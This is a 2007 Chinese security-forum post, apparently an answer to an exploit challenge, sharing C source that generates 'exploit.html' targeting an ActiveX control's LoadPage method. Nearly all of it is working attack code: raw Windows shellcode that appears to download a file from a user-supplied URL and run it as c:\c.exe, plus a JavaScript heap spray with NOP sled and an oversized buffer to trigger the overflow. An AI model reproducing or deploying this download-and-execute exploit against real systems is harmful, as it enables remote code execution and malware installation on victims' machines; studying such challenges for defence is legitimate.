首页
社区
课程
招聘
[原创]b 题
发表于: 2007-12-30 01:54 5333

[原创]b 题

dummy 活跃值
23
2007-12-30 01:54
5333
下面是我东拼西凑的代码

利用的最简单的 LoadPage 接口
/*
learn fuzzing exploit_me_B.dll
2007-12-29 1:29:05
dummyz@126.com
*/
#define _CRT_SECURE_NO_DEPRECATE

#include <windows.h>
#include <stdio.h>

const unsigned char shellcode[174] =
{
        // 必须是偶数大小
        0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A,
        0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F,
        0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1,
        0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C,
        0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41,
        0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03,
        0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B,
        0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC,
        0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB,
        0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00,
        0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
};

const char* script1 = \
        "<html><body><object id=\"obj\" classid=\"clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2\"></object><script>"
        "var shellcode = unescape(\"";
const char* script2 = \
        "\");"
        "fillblock = unescape(\"%u9090%u9090\");"
        "while ( fillblock.length < 0x50000 ) fillblock += fillblock;"
        "memory = new Array();"
        "for ( x = 0; x < 400; x++ ) memory[x] = fillblock + shellcode;"
        "var buffer = '\\x0a\\x0a\\x0a\\x0a';"
        "while (buffer.length < 400) buffer += '\\x0a\\x0a\\x0a\\x0a';"
        "obj.LoadPage(buffer, 1, 2, 3);"
        "</script>"
        "</body>"
        "</html>"
        "</script>"
        "</body>"
        "</html>";

int main(int argc, char* argv[])
{
        if ( argc != 2 )
        {
                printf("ex:fuck.exe 228K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4c8W2M7%4c8Q4x3X3g2U0L8$3#2Q4x3V1k6@1k6i4y4@1i4K6u0W2k6i4S2W2");
                return -1;
        }

        FILE *file = fopen("exploit.html", "w+");
        if ( file == NULL )
        {
                printf("create 'exploit.html' failed!\n");
                return -2;
        }

        fprintf(file, "%s", script1);
        for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
                fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);
       
        const unsigned l = strlen(argv[1]);
        for ( unsigned j = 0; j < l; j += 2 )
                fprintf(file, "%%u%02X%02X" , argv[1][j + 1], argv[1][j]);

        fprintf(file, "%s", script2);
        fclose(file);

        printf("make 'exploit.html' successed!\n");

        return 0;
}

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回